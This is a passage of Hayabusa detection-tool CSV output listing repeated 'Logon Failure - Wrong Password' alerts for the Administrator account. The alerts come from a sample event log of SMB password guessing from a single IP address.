Password,User: Administrator | Type: 3 | Computer: PJ8JvuvZZzwSOzFo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s06yKaogI6FYkXla | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCjOc7PguxwNKoQR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.876 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BX5IosnpdYZK5xZj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.905 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfMjB1epEm64wVEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:48.947 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb4FVO2SKsoMyt1K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.003 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1qoRw2jjFx4F6Wx6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ImiLeiteLoSw32I0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.083 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KcIYD47BIEP8gB0L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.120 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lUAeB15aWamcaZ8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFOKiSDWc1dWjzge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.211 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hqyMtzjKSJEtEAdx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.251 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtHsItpyFHQxvLWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.287 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RdGMqIhUGHj23Xm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfE5LVmrPaAFLwBR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.368 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1swKSla5gkdOwxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.408 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kL9MdVnRVogiP7hF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aQ0hRdwZvC5PBcXl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ctbv73J0Dot9raD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wKpWApJIKkjbtaPB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.590 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kVTAv9VoNpUyxQFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.642 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xb3t1dpuk9JZri5p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fy0UrW8TWrxAOX90 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iUXUbUsiE6Ahh9iD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.776 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2QQdQ6rQYLBf15AF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.820 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zG4eJLuQ4u2dKQG0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.854 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCfwHs2gVGiRc3Fy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.897 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67TcwQfTxgTtQvCU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:49.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imnSPKAKYzrCKSUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mMNbdjiXNUY0gTfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOAH0gjfs8JcXSMO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TnnB4KPBiDvKMsUL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.153 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aZRgpa5riqIEWhQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.198 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBL4nrs7f6cjlfsT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.247 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fgDupzqipe5jK0r5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5yPcTOWPuN8efJtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dszb6s0w6glvSkSw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ynu936pVVAuDUGT5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.407 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c55o3Dca2tiUVwb2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.444 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tnDmp2KK02LyJ7Xm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRUKrHDAmgEPcjQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.548 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PCGKDvPhzg6BlsuU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.594 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OU28biGLJkFmB117 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.628 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 029LphuWcoo9S2hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.670 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ItIROqP2wyzLJa9s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XngGun3HYopTkcrA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c91Qz5QNUczcm7m6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7nyWJJJhDiqnf1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnj7hAp20gZE9FCe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.869 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FydQjBxO7XninU5Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3P8InIzyD86BXr1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvKGa3A3qw7s0cZX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:50.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QTY7tRVEMjXZXFyH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4Ij1NSYGYbq4PxS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 47fOxZAYhjxLzEoU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGxXaNNChVScbHe6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.161 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jTcVeB8f2Rs3Bldo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.201 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yeSnUlIbuDVNffey | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eXIM4tWru1x0AahJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.379 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m2pBLn6aO8L4kiH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.441 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EG5daDsgTMZsNg0T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.492 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3V8z6j7GLO3ywBXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AsezMvhUNedLNqg4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.574 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h16AvUVZG8qch7LC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.687 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PB5xe3Aieya8N3IU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.765 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezGXIhYrkk2Q9pe5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.813 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VSGIVhD6pO5z47DY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.862 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2vEjOhJW9G3aIfV0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hyvCpW3aOZqCOldu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhS2wAAkfmZuLll | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:51.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bEh0KTMbbFtsfck | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mw9u61efa06vYv6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SAxij8QYLxxriIvu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.134 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HK2tbzICSpTrglud | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rHJ70VrEwCQjSvL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8qwZT66ExkdJDZaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.300 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.336 